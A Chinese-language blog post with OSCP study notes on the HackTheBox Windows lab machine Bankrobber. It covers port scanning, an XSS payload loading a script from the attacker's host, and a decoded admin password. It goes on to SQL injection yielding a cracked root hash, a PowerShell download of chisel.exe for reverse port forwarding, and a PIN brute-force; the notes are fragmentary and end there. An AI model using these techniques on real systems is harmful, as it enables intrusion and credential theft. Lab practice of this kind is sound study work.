OSCP备考_0x49_HackThBox靶机_Windows_Bankrobber

Ethan医生5个月前靶场207

Bankrobber

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.109 (扫描TCP)

image.png

80存在apache,所以我们要关注php(特别关注)

443是一个https的apache,在80存在异常的时候,可能就是被跳转到https了

而后就是3306的MariaDB (unauthorized)

然后就是每次都会遇到的smb枚举

基本上我们在这个信息收集中获取的信息就这么多了



python3 -m http.server 80。  --本地开服务器让那边找你这个test.js

<script src="http://10.10.16.43/xss.js"></script>


image.png


然后将信息返回到服务器上

image.png


SG9wZWxlc3Nyb21hbnRpYw%3D%3D

SG9wZWxlc3Nyb21hbnRpYw==

解密后发现

admin/Hopelessromantic。

登入后发现存在SQL注入

image.png


image.png

成功获取 root 用户哈希值:F435725A173757E57BD36B09048B8B610FF4D0C4,通过网站破解md5值
破解网站:https://crackstation.net/


成功破解密码为Welkom1!

PHP代码审计

访问地址http://10.10.10.154/notes.txt发现这是 xampp,默认绝对路径为C:/xampp/htdocs






查看端口和进程发现bankv2.exe运行在本地的910端口,可以把端口转发出来:


# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 8000 --reverse

# target
powershell -c "wget 10.10.14.15:7777/chisel.exe -o c.exe"
c.exe client 10.10.14.15:8000 R:910:localhost:910


然后测试连接本机910端口,提示需要4位pin码:


bankv2

首先脚本爆破出来pin码是0021:


标签: OSCP

相关文章

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.243.247 (扫描TCP)http://10.129.243.247/home.ph...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。